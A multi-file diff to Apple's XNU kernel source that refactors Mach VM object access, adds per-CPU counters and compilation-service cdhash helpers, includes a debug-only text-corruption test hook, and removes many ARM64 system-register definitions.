@@ -3562,7 +3772,7 @@ mach_memory_entry_map_size(
                return KERN_INVALID_ARGUMENT;
        }
 
-       mem_entry = (vm_named_entry_t) entry_port->ip_kobject;
+       mem_entry = (vm_named_entry_t) ipc_kobject_get(entry_port);
        named_entry_lock(mem_entry);
 
        if (mem_entry->is_sub_map) {
@@ -4234,8 +4444,8 @@ mach_vm_remap(
        vm_map_t                src_map,
        mach_vm_offset_t        memory_address,
        boolean_t               copy,
-       vm_prot_t               *cur_protection,
-       vm_prot_t               *max_protection,
+       vm_prot_t               *cur_protection,   /* OUT */
+       vm_prot_t               *max_protection,   /* OUT */
        vm_inherit_t            inheritance)
 {
        return mach_vm_remap_external(target_map, address, size, mask, flags, src_map, memory_address,
index 9569ed36c333baef09187c49bcc97049ea6de272..c262c406717615111fbcda8350f56b361b6146ed 100644 (file)
@@ -206,7 +206,7 @@ copyio(int copy_type, user_addr_t user_addr, char *kernel_addr,
                         * Size of elements in the permanent zone is not saved as a part of the
                         * zone's info
                         */
-                       if (__improbable(src_zone && !src_zone->permanent &&
+                       if (__improbable(src_zone && !src_zone->z_permanent &&
                            kernel_buf_size < nbytes)) {
                                panic("copyio: kernel buffer %p has size %lu < nbytes %lu", kernel_addr, kernel_buf_size, nbytes);
                        }
diff --git a/osfmk/x86_64/counter.c b/osfmk/x86_64/counter.c
new file mode 100644 (file)
index 0000000..4211024
--- /dev/null
@@ -0,0 +1,109 @@
+/* * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+/*
+ * @OSF_COPYRIGHT@
+ */
+/*
+ * Mach Operating System
+ * Copyright (c) 1991,1990,1989,1988,1987 Carnegie Mellon University
+ * All Rights Reserved.
+ *
+ * Permission to use, copy, modify and distribute this software and its
+ * documentation is hereby granted, provided that both the copyright
+ * notice and this permission notice appear in all copies of the
+ * software, derivative works or modified versions, and any portions
+ * thereof, and that both notices appear in supporting documentation.
+ *
+ * CARNEGIE MELLON ALLOWS FREE USE OF THIS SOFTWARE IN ITS "AS IS"
+ * CONDITION.  CARNEGIE MELLON DISCLAIMS ANY LIABILITY OF ANY KIND FOR
+ * ANY DAMAGES WHATSOEVER RESULTING FROM THE USE OF THIS SOFTWARE.
+ *
+ * Carnegie Mellon requests users of this software to return to
+ *
+ *  Software Distribution Coordinator  or  Software.Distribution@CS.CMU.EDU
+ *  School of Computer Science
+ *  Carnegie Mellon University
+ *  Pittsburgh PA 15213-3890
+ *
+ * any improvements or extensions that they make and grant Carnegie Mellon
+ * the rights to redistribute these changes.
+ */
+#include <kern/assert.h>
+#include <kern/cpu_data.h>
+#include <kern/counter.h>
+#include <kern/zalloc.h>
+#include <machine/atomic.h>
+#include <machine/machine_routines.h>
+#include <machine/cpu_number.h>
+
+OS_OVERLOADABLE
+void
+counter_add(scalable_counter_t *counter, uint64_t amount)
+{
+       disable_preemption();
+       (*zpercpu_get(*counter)) += amount;
+       enable_preemption();
+}
+
+OS_OVERLOADABLE
+void
+counter_inc(scalable_counter_t *counter)
+{
+       disable_preemption();
+       (*zpercpu_get(*counter))++;
+       enable_preemption();
+}
+
+OS_OVERLOADABLE
+void
+counter_dec(scalable_counter_t *counter)
+{
+       disable_preemption();
+       (*zpercpu_get(*counter))--;
+       enable_preemption();
+}
+
+OS_OVERLOADABLE
+void
+counter_add_preemption_disabled(scalable_counter_t *counter, uint64_t amount)
+{
+       (*zpercpu_get(*counter)) += amount;
+}
+
+OS_OVERLOADABLE
+void
+counter_inc_preemption_disabled(scalable_counter_t *counter)
+{
+       (*zpercpu_get(*counter))++;
+}
+
+OS_OVERLOADABLE
+void
+counter_dec_preemption_disabled(scalable_counter_t *counter)
+{
+       (*zpercpu_get(*counter))--;
+}
index 79ad35a0eb81ca09e3e640d0fce40ea24799f9ca..aa370791b5cad71c0c9f153f27d071eddec70ba8 100644 (file)
@@ -3275,6 +3275,41 @@ pmap_lookup_in_static_trust_cache(const uint8_t __unused cdhash[20])
        return false;
 }
 
+SIMPLE_LOCK_DECLARE(pmap_compilation_service_cdhash_lock, 0);
+uint8_t pmap_compilation_service_cdhash[CS_CDHASH_LEN] = { 0 };
+
+void
+pmap_set_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN])
+{
+       simple_lock(&pmap_compilation_service_cdhash_lock, LCK_GRP_NULL);
+       memcpy(pmap_compilation_service_cdhash, cdhash, CS_CDHASH_LEN);
+       simple_unlock(&pmap_compilation_service_cdhash_lock);
+
+#if DEVELOPMENT || DEBUG
+       printf("Added Compilation Service CDHash through the PMAP: 0x%02X 0x%02X 0x%02X 0x%02X\n", cdhash[0], cdhash[1], cdhash[2], cdhash[4]);
+#endif
+}
+
+bool
+pmap_match_compilation_service_cdhash(const uint8_t cdhash[CS_CDHASH_LEN])
+{
+       bool match = false;
+
+       simple_lock(&pmap_compilation_service_cdhash_lock, LCK_GRP_NULL);
+       if (bcmp(pmap_compilation_service_cdhash, cdhash, CS_CDHASH_LEN) == 0) {
+               match = true;
+       }
+       simple_unlock(&pmap_compilation_service_cdhash_lock);
+
+#if DEVELOPMENT || DEBUG
+       if (match) {
+               printf("Matched Compilation Service CDHash through the PMAP\n");
+       }
+#endif
+
+       return match;
+}
+
 bool
 pmap_in_ppl(void)
 {
@@ -3307,3 +3342,26 @@ pmap_free_reserved_ppl_page(void __unused *kva)
 {
        // Unsupported on this architecture.
 }
+
+#if DEVELOPMENT || DEBUG
+/*
+ * Used for unit testing recovery from text corruptions.
+ */
+kern_return_t
+pmap_test_text_corruption(pmap_paddr_t pa)
+{
+       int pai;
+       uint8_t *va;
+
+       pai = ppn_to_pai(atop(pa));
+       if (!IS_MANAGED_PAGE(pai)) {
+               return KERN_FAILURE;
+       }
+
+       va = (uint8_t *)PHYSMAP_PTOV(pa);
+       va[0] = 0x0f; /* opcode for UD2 */
+       va[1] = 0x0b;
+
+       return KERN_SUCCESS;
+}
+#endif /* DEVELOPMENT || DEBUG */
index 1ddd6fc651a755cfbf502dbf496c78caa81a79ec..b3b8676329f6c73314d5f3cd1dc40a716a5ef50c 100644 (file)
@@ -407,7 +407,7 @@ pe_run_debug_command(command_buffer_element_t *command_buffer)
                                nanoseconds_to_absolutetime(command_buffer->delay_us * NSEC_PER_USEC, &deadline);
                                deadline += ml_get_timebase();
                                while (ml_get_timebase() < deadline) {
-                                       ;
+                                       os_compiler_barrier();
                                }
                        }
                }
index 8ff54da6c1c9ac1981cf63d26be0e6f375c20aac..2934d4da8aa79ec95f533a9cc3dfa8d98ce1418c 100644 (file)
@@ -394,7 +394,10 @@ PE_init_platform(boolean_t vm_initialized, void *args)
                PE_state.video.v_width = boot_args_ptr->Video.v_width;
                PE_state.video.v_height = boot_args_ptr->Video.v_height;
                PE_state.video.v_depth = (boot_args_ptr->Video.v_depth >> kBootVideoDepthDepthShift) & kBootVideoDepthMask;
-               PE_state.video.v_rotate = (boot_args_ptr->Video.v_depth >> kBootVideoDepthRotateShift) & kBootVideoDepthMask;
+               PE_state.video.v_rotate = (
+                       ((boot_args_ptr->Video.v_depth >> kBootVideoDepthRotateShift) & kBootVideoDepthMask) +    // rotation
+                       ((boot_args_ptr->Video.v_depth >> kBootVideoDepthBootRotateShift)  & kBootVideoDepthMask) // add extra boot rotation
+                       ) % 4;
                PE_state.video.v_scale = ((boot_args_ptr->Video.v_depth >> kBootVideoDepthScaleShift) & kBootVideoDepthMask) + 1;
                PE_state.video.v_display = boot_args_ptr->Video.v_display;
                strlcpy(PE_state.video.v_pixelFormat, "BBBBBBBBGGGGGGGGRRRRRRRR", sizeof(PE_state.video.v_pixelFormat));
index b555aa1e2a209f0bb5a77c9cab7a5b104e9db1a9..cf8dab9fbc638f52911e1ae62e8b333ef7aeb817 100644 (file)
@@ -629,8 +629,8 @@ SECURITY_READ_ONLY_LATE(static struct pe_serial_functions) dockchannel_uart_seri
 
 /****************************************************************************/
 #ifdef  PI3_UART
-vm_offset_t pi3_gpio_base_vaddr = 0;
-vm_offset_t pi3_aux_base_vaddr = 0;
+static vm_offset_t pi3_gpio_base_vaddr = 0;
+static vm_offset_t pi3_aux_base_vaddr = 0;
 static int
 pi3_uart_tr0(void)
 {
@@ -716,6 +716,10 @@ SECURITY_READ_ONLY_LATE(static struct pe_serial_functions) pi3_uart_serial_funct
 };
 
 #endif /* PI3_UART */
+
+/*****************************************************************************/
+
+
 /*****************************************************************************/
 
 static void
@@ -778,6 +782,7 @@ serial_init(void)
        }
 #endif /* PI3_UART */
 
+
 #ifdef DOCKCHANNEL_UART
        uint32_t no_dockchannel_uart = 0;
        if (SecureDTFindEntry("name", "dockchannel-uart", &entryP) == kSuccess) {
index 9a9c313613de46613842eb1416b1818273e47d75..f5a82bb197211092d6193cc99518d882d172c213 100644 (file)
@@ -30,6 +30,7 @@ struct Boot_Video {
 #define kBootVideoDepthDepthShift       (0)
 #define kBootVideoDepthRotateShift      (8)
 #define kBootVideoDepthScaleShift       (16)
+#define kBootVideoDepthBootRotateShift  (24)
 
 #define kBootFlagsDarkBoot              (1 << 0)
 
index 27025566708853989fdc7792cf2094a12a2cbb02..ade05dc8eaa4e3da6437aac689a611d3b5a9a07a 100644 (file)
@@ -14,7 +14,6 @@
 
 #ifdef APPLE_ARM64_ARCH_FAMILY
 
-#define ARM64_REG_HID0                    S3_0_c15_c0_0
 #define ARM64_REG_HID0_LoopBuffDisb       (1<<20)
 #define ARM64_REG_HID0_AMXCacheFusionDisb (1ULL<<21)
 #define ARM64_REG_HID0_ICPrefLimitOneBrn  (1<<25)
 #define ARM64_REG_HID0_ICPrefDepth_bmsk   (7ULL <<ARM64_REG_HID0_ICPrefDepth_bshift)
 #define ARM64_REG_HID0_ICPrefDepth_VALUE  (1ULL <<ARM64_REG_HID0_ICPrefDepth_bshift)
 
-#define ARM64_REG_EHID0               S3_0_c15_c0_1
 #define ARM64_REG_EHID0_nfpRetFwdDisb (1ULL<<45)
 
-#define ARM64_REG_HID1                              S3_0_c15_c1_0
 #define ARM64_REG_HID1_disCmpBrFusion               (1<<14)
 #define ARM64_REG_HID1_forceNexL3ClkOn              (1<<15)
 #define ARM64_REG_HID1_rccForceAllIexL3ClksOn       (1<<23)
 #define ARM64_REG_HID1_enaBrKillLimit               (1ULL << 60)
 #define ARM64_REG_HID1_SpareBit6                    (1ULL << 60)
 
-#define ARM64_REG_EHID1                             S3_0_c15_c1_1
 #define ARM64_REG_EHID1_disMSRSpecDAIF              (1ULL << 30)
 
-#define ARM64_REG_HID2                    S3_0_c15_c2_0
 #define ARM64_REG_HID2_disMMUmtlbPrefetch (1<<13)
 #define ARM64_REG_HID2_ForcePurgeMtb      (1<<17)
 
-#define ARM64_REG_EHID2                   S3_0_c15_c2_1
 #define ARM64_REG_EHID2_ForcePurgeMtb     (1<<17)
 
-#define ARM64_REG_HID3                                        S3_0_c15_c3_0
 #define ARM64_REG_HID3_DisColorOpt                            (1<<2)
 #define ARM64_REG_HID3_DisDcZvaCmdOnly                        (1<<25)
 #define ARM64_REG_HID3_DisArbFixBifCrd                        (1ULL<<44)
 #define ARM64_REG_HID3_DisXmonSnpEvictTriggerL2StarvationMode (1<<54)
 #define ARM64_REG_HID3_DevPcieThrottleEna                     (1ULL<<63)
 
-#define ARM64_REG_EHID3                 S3_0_c15_c3_1
 #define ARM64_REG_EHID3_DisColorOpt     (1<<2)
 #define ARM64_REG_EHID3_DisDcZvaCmdOnly (1<<25)
 
-#define ARM64_REG_HID4                          S3_0_c15_c4_0
-#define ARM64_REG_EHID4                         S3_0_c15_c4_1
-
 #define ARM64_REG_HID4_DisDcMVAOps                      (1<<11)
 #define ARM64_REG_HID4_DisSpecLnchRead                  (1<<33)
 #define ARM64_REG_HID4_ForceNsOrdLdReqNoOlderLd         (1<<39)
@@ -78,7 +67,6 @@
 #define ARM64_REG_HID4_disSpecLSRedirect                (1<<9)
 #define ARM64_REG_HID4_DisSTNTWidget                    (1<<1)
 
-#define ARM64_REG_HID5                          S3_0_c15_c5_0
 #define ARM64_REG_HID5_DisHwpLd                 (1<<44)
 #define ARM64_REG_HID5_DisHwpSt                 (1<<45)
 #define ARM64_REG_HID5_DisFill2cMerge           (1ULL << 61)
 #define ARM64_REG_HID5_CrdPrbSnpRsvd_mask       (0xFULL << ARM64_REG_HID5_CrdPrbSnpRsvd_shift)
 #define ARM64_REG_HID5_CrdPrbSnpRsvd_VALUE(x)   (x << ARM64_REG_HID5_CrdPrbSnpRsvd_shift)
 
-#define ARM64_REG_EHID5            S3_0_c15_c5_1
 #define ARM64_REG_EHID5_DisFillByp (1 << 35)
 
-#define ARM64_REG_HID6                          S3_0_c15_c6_0
 #define ARM64_REG_HID6_UpCrdTknInitC2_shift     (5)
 #define ARM64_REG_HID6_UpCrdTknInitC2_mask      (0x1FULL << ARM64_REG_HID6_UpCrdTknInitC2_shift)
 #define ARM64_REG_HID6_DisClkDivGating          (1ULL << 55)
 
-#define ARM64_REG_HID7                                                 S3_0_c15_c7_0
 #define ARM64_REG_HID7_forceNonSpecTargetedTimerSel_shift              (24)
 #define ARM64_REG_HID7_forceNonSpecTargetedTimerSel_mask               (3ULL << ARM64_REG_HID7_forceNonSpecTargetedTimerSel_shift)
 #define ARM64_REG_HID7_forceNonSpecTargetedTimerSel_VALUE              (3ULL << ARM64_REG_HID7_forceNonSpecTargetedTimerSel_shift)
 #define ARM64_REG_HID7_forceNonSpecIfStepping                          (1ULL << 20)
+#define ARM64_REG_HID7_forceNonSpecIfSpecFlushPtrNEBlkRtrPtr           (1ULL << 19)
 #define ARM64_REG_HID7_forceNonSpecIfSpecFlushPtrInvalidAndMPValid     (1ULL << 16)
 #define ARM64_REG_HID7_disNexFastFmul                                  (1 << 10)
 #define ARM64_REG_HID7_disCrossPick2                                   (1ULL << 7)
 
-#define ARM64_REG_HID8                     S3_0_c15_c8_0
 #define ARM64_REG_HID8_DataSetID0_VALUE    (0xF << 4)
 #define ARM64_REG_HID8_DataSetID1_VALUE    (0xF << 8)
 #define ARM64_REG_HID8_WkeForceStrictOrder (0x1ULL << 35)
 #define ARM64_REG_HID8_DataSetID2_VALUE    (0xF << 56)
 #define ARM64_REG_HID8_DataSetID3_VALUE    (0xF << 60)
 
-#define ARM64_REG_HID9                         S3_0_c15_c9_0
 #define ARM64_REG_HID9_TSOAllowDcZvaWC         (1ULL << 26)
 #define ARM64_REG_HID9_TSOSerializeVLDmicroops (1ULL << 29)
 #define ARM64_REG_HID9_EnableFixBug51667805    (1ULL << 48)
 #define ARM64_REG_HID9_EnableFixBug58566122    (3ULL << 53)
 #define ARM64_REG_HID9_HidEnFix55719865        (1ULL << 55)
 
-#define ARM64_REG_EHID9            S3_0_c15_c9_1
 #define ARM64_REG_EHID9_DevThrottle2Ena        (1ULL << 5)
 
-#define ARM64_REG_HID10            S3_0_c15_c10_0
 #define ARM64_REG_HID10_DisHwpGups (1ULL << 0)
 
-#define ARM64_REG_EHID10                        S3_0_c15_c10_1
 #define ARM64_REG_EHID10_rccDisPwrSavePrfClkOff (1ULL << 19)
 #define ARM64_REG_EHID10_ForceWStDrainUc        (1ULL << 32)
 #define ARM64_REG_EHID10_DisZVATemporalTSO      (1ULL << 49)
 
-#if defined(APPLETYPHOON) || defined(APPLETWISTER)
-#define ARM64_REG_HID11                      S3_0_c15_c13_0
-#else /* defined(APPLECYCLONE) || defined(APPLETYPHOON) || defined(APPLETWISTER) */
-#define ARM64_REG_HID11                      S3_0_c15_c11_0
-#endif /* defined(APPLECYCLONE) || defined(APPLETYPHOON) || defined(APPLETWISTER) */
 #define ARM64_REG_HID11_DisX64NTLnchOpt      (1ULL << 1)
 #define ARM64_REG_HID11_DisFillC1BubOpt      (1ULL << 7)
 #define ARM64_REG_HID11_HidEnFixUc55719865   (1ULL << 15)
 #define ARM64_REG_HID11_DisFastDrainOpt      (1ULL << 23)
 #define ARM64_REG_HID11_DisLDNTWidget        (1ULL << 59)
 
-#define ARM64_REG_EHID11                     S3_0_c15_c11_1
 #define ARM64_REG_EHID11_SmbDrainThresh_mask (3ULL << 40)
 
-#define ARM64_REG_HID13                      S3_0_c15_c14_0
 #define ARM64_REG_HID13_PreCyc_shift         (14)
 #define ARM64_REG_HID13_PreCyc_mask          (0xFULL << ARM64_REG_HID13_PreCyc_shift)
 #define ARM64_REG_HID13_PreCyc_VALUE         (0x4ULL << ARM64_REG_HID13_PreCyc_shift)
 
-#define ARM64_REG_HID14                                 S3_0_c15_c15_0
 #define ARM64_REG_HID14_NexSleepTimeOutCyc_shift        (0)
 #define ARM64_REG_HID14_NexSleepTimeOutCyc_VALUE        0x7D0ULL
 
-#define ARM64_REG_HID16                      S3_0_c15_c15_2
 #define ARM64_REG_HID16_leqThrottleAggr      (1ULL << 18)
 #define ARM64_REG_HID16_SpareBit0            (1ULL << 56)
 #define ARM64_REG_HID16_EnRs4Sec             (1ULL << 57)
 #define ARM64_REG_HID16_EnMPCyc7             (1ULL << 62)
 #define ARM64_REG_HID16_SpareBit7            (1ULL << 63)
 
-#define ARM64_REG_HID17                         S3_0_c15_c15_5
 #define ARM64_REG_HID17_CrdEdbSnpRsvd_shift     (0)
 #define ARM64_REG_HID17_CrdEdbSnpRsvd_mask      (0x7ULL << ARM64_REG_HID17_CrdEdbSnpRsvd_shift)
 #define ARM64_REG_HID17_CrdEdbSnpRsvd_VALUE     (0x2ULL << ARM64_REG_HID17_CrdEdbSnpRsvd_shift)
 
-#define ARM64_REG_HID18                      S3_0_c15_c11_2
 #define ARM64_REG_HID18_HVCSpecDisable       (1ULL << 14)
 #define ARM64_REG_HID18_SpareBit17           (1ULL << 49)
 
-#define ARM64_REG_HID21                            S3_0_c15_c1_3
 #define ARM64_REG_HID21_EnLdrexFillRply            (1ULL << 19)
 #define ARM64_REG_HID21_LdqRtrWaitForOldStRelCmpl  (1ULL << 33)
 #define ARM64_REG_HID21_DisCdpRplyPurgedTrans      (1ULL << 34)
 
 #if defined(APPLETYPHOON) || defined(APPLETWISTER)
-#define ARM64_REG_CYC_CFG              S3_5_c15_c4_0
 #define ARM64_REG_CYC_CFG_skipInit     (1ULL<<30)
 #define ARM64_REG_CYC_CFG_deepSleep    (1ULL<<24)
 #else /* defined(APPLECYCLONE) || defined(APPLETYPHOON) || defined(APPLETWISTER) */
-#define ARM64_REG_ACC_OVRD             S3_5_c15_c6_0
-#if defined(APPLEMONSOON)
-#define ARM64_REG_ACC_EBLK_OVRD        S3_5_c15_c6_1 // EBLK_OVRD on Zephyr
-#endif /* defined(APPLEMONSOON) */
-
 #define ARM64_REG_ACC_OVRD_enDeepSleep                 (1ULL << 34)
 #define ARM64_REG_ACC_OVRD_disPioOnWfiCpu              (1ULL << 32)
 #define ARM64_REG_ACC_OVRD_dsblClkDtr                  (1ULL << 29)
 #define ARM64_REG_ACC_OVRD_disL2Flush4AccSlp_deepsleep (2ULL << 15)
 #define ARM64_REG_ACC_OVRD_ok2PwrDnSRM_mask            (3ULL << 13)
 #define ARM64_REG_ACC_OVRD_ok2PwrDnSRM_deepsleep       (3ULL << 13)
-
 #endif /* defined(APPLECYCLONE) || defined(APPLETYPHOON) || defined(APPLETWISTER) */
 
-#define ARM64_REG_CYC_OVRD                     S3_5_c15_c5_0
 #define ARM64_REG_CYC_OVRD_irq_mask            (3<<22)
 #define ARM64_REG_CYC_OVRD_irq_disable         (2<<22)
 #define ARM64_REG_CYC_OVRD_fiq_mask            (3<<20)
 #define ARM64_REG_CYC_OVRD_dsblSnoopPTime      (1ULL << 31)  /// Don't fetch the timebase from the P-block
 #endif /* APPLEMONSOON */
 
-#define ARM64_REG_LSU_ERR_STS                  S3_3_c15_c0_0
 #define ARM64_REG_LSU_ERR_STS_L1DTlbMultiHitEN (1ULL<<54)
-
-#define ARM64_REG_E_LSU_ERR_STS                S3_3_c15_c2_0
-
-#define ARM64_REG_LSU_ERR_CTL                  S3_3_c15_c1_0
 #define ARM64_REG_LSU_ERR_CTL_L1DTlbMultiHitEN (1ULL<<3)
 
-#define ARM64_REG_FED_ERR_STS                  S3_4_C15_C0_0
-
-#define ARM64_REG_E_FED_ERR_STS                S3_4_C15_C0_2
-
-#define ARM64_REG_MMU_ERR_STS                  S3_6_c15_c0_0
-
-#define ARM64_REG_E_MMU_ERR_STS                s3_6_c15_c2_0
-
-#define ARM64_REG_L2C_ERR_STS                  S3_3_c15_c8_0
-
-#define ARM64_REG_L2C_ERR_ADR                  S3_3_c15_c9_0
-
-#define ARM64_REG_L2C_ERR_INF                  S3_3_c15_c10_0
-
-#define ARM64_REG_MIGSTS_EL1                   S3_4_c15_c0_4
-
-#define ARM64_REG_DPC_ERR_STS                  S3_5_c15_c0_5
-
-#if defined(HAS_KTRR)
-
-#ifdef ASSEMBLER
-#define ARM64_REG_KTRR_LOWER_EL1 S3_4_c15_c2_3
-#define ARM64_REG_KTRR_UPPER_EL1 S3_4_c15_c2_4
-#define ARM64_REG_KTRR_LOCK_EL1  S3_4_c15_c2_2
-#else /* ASSEMBLER */
-#define ARM64_REG_KTRR_LOWER_EL1 "S3_4_c15_c2_3"
-#define ARM64_REG_KTRR_UPPER_EL1 "S3_4_c15_c2_4"
-#define ARM64_REG_KTRR_LOCK_EL1  "S3_4_c15_c2_2"
-#endif /* ASSEMBLER */
-
-#endif /* defined (HAS_KTRR) */
-
-#if defined(HAS_CTRR)
-
-#ifdef ASSEMBLER
-#define ARM64_REG_CTRR_A_LWR_EL1 S3_4_c15_c2_3
-#define ARM64_REG_CTRR_A_UPR_EL1 S3_4_c15_c2_4
-#define ARM64_REG_CTRR_CTL_EL1   S3_4_c15_c2_5
-#define ARM64_REG_CTRR_LOCK_EL1  S3_4_c15_c2_2
-
-#define ACC_CTRR_A_LWR_EL2       S3_4_c15_c11_0
-#define ACC_CTRR_A_UPR_EL2       S3_4_c15_c11_1
-#define ACC_CTRR_CTL_EL2         S3_4_c15_c11_4
-#define ACC_CTRR_LOCK_EL2        S3_4_c15_c11_5
-#else /* ASSEMBLER */
-#define ARM64_REG_CTRR_A_LWR_EL1 "S3_4_c15_c2_3"
-#define ARM64_REG_CTRR_A_UPR_EL1 "S3_4_c15_c2_4"
-#define ARM64_REG_CTRR_CTL_EL1   "S3_4_c15_c2_5"
-#define ARM64_REG_CTRR_LOCK_EL1  "S3_4_c15_c2_2"
-
-#define ACC_CTRR_A_LWR_EL2       "S3_4_c15_c11_0"
-#define ACC_CTRR_A_UPR_EL2       "S3_4_c15_c11_1"
-#define ACC_CTRR_CTL_EL2         "S3_4_c15_c11_4"
-#define ACC_CTRR_LOCK_EL2        "S3_4_c15_c11_5"
-#endif /* ASSEMBLER */
-
-#define CTRR_CTL_EL1_A_MMUOFF_WRPROTECT  (1 << 0)
-#define CTRR_CTL_EL1_A_MMUON_WRPROTECT   (1 << 1)
-#define CTRR_CTL_EL1_B_MMUOFF_WRPROTECT  (1 << 2)
-#define CTRR_CTL_EL1_B_MMUON_WRPROTECT   (1 << 3)
-#define CTRR_CTL_EL1_A_PXN               (1 << 4)
-#define CTRR_CTL_EL1_B_PXN               (1 << 5)
-#define CTRR_CTL_EL1_A_UXN               (1 << 6)
-#define CTRR_CTL_EL1_B_UXN               (1 << 7)
-
-#endif /* defined (HAS_CTRR) */
 
 #if defined(HAS_IPI)
-
 #define ARM64_REG_IPI_RR_TYPE_IMMEDIATE (0 << 28)
 #define ARM64_REG_IPI_RR_TYPE_RETRACT   (1 << 28)
 #define ARM64_REG_IPI_RR_TYPE_DEFERRED  (2 << 28)
 #define ARM64_REG_IPI_RR_TYPE_NOWAKE    (3 << 28)
-
-#if defined(HAS_CLUSTER)
-#define ARM64_REG_IPI_RR_LOCAL          __MSR_STR(S3_5_c15_c0_0)
-#define ARM64_REG_IPI_RR_GLOBAL         __MSR_STR(S3_5_c15_c0_1)
-#else /* defined(HAS_CLUSTER) */
-#define ARM64_REG_IPI_RR                __MSR_STR(S3_5_c15_c0_1)
-#endif /* defined(HAS_CLUSTER) */
-
-#define ARM64_REG_IPI_SR                __MSR_STR(S3_5_c15_c1_1)
-#define ARM64_REG_IPI_CR                __MSR_STR(S3_5_c15_c3_1)
-
 #endif /* defined(HAS_IPI) */
 
 
 #endif /* APPLE_ARM64_ARCH_FAMILY */
 
 #if defined(HAS_NEX_PG)
-#define ARM64_REG_HID13             S3_0_c15_c14_0
 #define ARM64_REG_HID13_RstCyc_mask (0xfULL << 60)
 #define ARM64_REG_HID13_RstCyc_val  (0xcULL << 60)
 
-#define ARM64_REG_HID14             S3_0_c15_c15_0
 #define ARM64_REG_HID14_NexPwgEn    (1ULL << 32)
 #endif /* defined(HAS_NEX_PG) */
 
-#define ARM64_REG_EHID20                                        S3_0_c15_c1_2
 #define ARM64_REG_EHID20_forceNonSpecTargetedTimerSel_shift     (21)
 #define ARM64_REG_EHID20_forceNonSpecTargetedTimerSel_mask      (3ULL << ARM64_REG_EHID20_forceNonSpecTargetedTimerSel_shift)
 #define ARM64_REG_EHID20_forceNonSpecTargetedTimerSel_VALUE     (3ULL << ARM64_REG_EHID20_forceNonSpecTargetedTimerSel_shift)
 #define ARM64_REG_EHID20_forceNonSpecIfSpecFlushPtrNEBlkRtrPtr  (1ULL << 16)
+#define ARM64_REG_EHID20_forceNonSpecIfOldestRedirVldAndOlder   (1ULL << 15)
 #define ARM64_REG_EHID20_trapSMC                                (1ULL << 8)
 #define ARM64_REG_EHID20_forceNonSpecIfOldestRedirVldAndOlder   (1ULL << 15)
 
 #if defined(HAS_BP_RET)
-#define ARM64_REG_ACC_CFG             S3_5_c15_c4_0
 #define ARM64_REG_ACC_CFG_bdpSlpEn    (1ULL << 2)
 #define ARM64_REG_ACC_CFG_btpSlpEn    (1ULL << 3)
 #define ARM64_REG_ACC_CFG_bpSlp_mask  3
 #define ARM64_REG_ACC_CFG_bpSlp_shift 2
 #endif /* defined(HAS_BP_RET) */
 
-
-#if defined(HAS_APPLE_PAC)
-
-
-#if ASSEMBLER
-#define ARM64_REG_APIAKEYLO_EL1        S3_0_c2_c1_0
-#define ARM64_REG_APIAKEYHI_EL1        S3_0_c2_c1_1
-#define ARM64_REG_APIBKEYLO_EL1        S3_0_c2_c1_2
-#define ARM64_REG_APIBKEYHI_EL1        S3_0_c2_c1_3
-
-#define ARM64_REG_APDAKEYLO_EL1        S3_0_c2_c2_0
-#define ARM64_REG_APDAKEYHI_EL1        S3_0_c2_c2_1
-#define ARM64_REG_APDBKEYLO_EL1        S3_0_c2_c2_2
-#define ARM64_REG_APDBKEYHI_EL1        S3_0_c2_c2_3
-
-#define ARM64_REG_APGAKEYLO_EL1        S3_0_c2_c3_0
-#define ARM64_REG_APGAKEYHI_EL1        S3_0_c2_c3_1
-#else /* ASSEMBLER */
-#define ARM64_REG_APIAKEYLO_EL1        "S3_0_c2_c1_0"
-#define ARM64_REG_APIAKEYHI_EL1        "S3_0_c2_c1_1"
-#define ARM64_REG_APIBKEYLO_EL1        "S3_0_c2_c1_2"
-#define ARM64_REG_APIBKEYHI_EL1        "S3_0_c2_c1_3"
-
-#define ARM64_REG_APDAKEYLO_EL1        "S3_0_c2_c2_0"
-#define ARM64_REG_APDAKEYHI_EL1        "S3_0_c2_c2_1"
-#define ARM64_REG_APDBKEYLO_EL1        "S3_0_c2_c2_2"
-#define ARM64_REG_APDBKEYHI_EL1        "S3_0_c2_c2_3"
-
-#define ARM64_REG_APGAKEYLO_EL1        "S3_0_c2_c3_0"
-#define ARM64_REG_APGAKEYHI_EL1        "S3_0_c2_c3_1"
-#endif /* ASSEMBLER */
-#endif /* HAS_APPLE_PAC */
-
 #if defined(HAS_VMSA_LOCK)
-
-#define ARM64_REG_VMSA_LOCK_EL1 S3_4_c15_c1_2
-
 #define VMSA_LOCK_VBAR_EL1      (1ULL << 0)
 #define VMSA_LOCK_SCTLR_EL1     (1ULL << 1)
 #define VMSA_LOCK_TCR_EL1       (1ULL << 2)
 #define VMSA_LOCK_TTBR0_EL1     (1ULL << 3)
 #define VMSA_LOCK_TTBR1_EL1     (1ULL << 4)
 #define VMSA_LOCK_SCTLR_M_BIT   (1ULL << 63)
-
 #endif /* HAS_VMSA_LOCK */
 
-
-
 #define MPIDR_PNE_SHIFT 16 // pcore not ecore
 #define MPIDR_PNE       (1 << MPIDR_PNE_SHIFT)
 
 
-
 #define CPU_PIO_CPU_STS_OFFSET               (0x100ULL)
 #define CPU_PIO_CPU_STS_cpuRunSt_mask        (0xff)
 
index 2d4d6690d7f3bcb53e93da6d596f19745f1e5128..0ae24bef825e345d9d724ec85a16f8bb98954c5b 100644 (file)
 #define MAX_CPU_CLUSTERS               2
 
 #define XNU_MONITOR                    1 /* Secure pmap runtime */
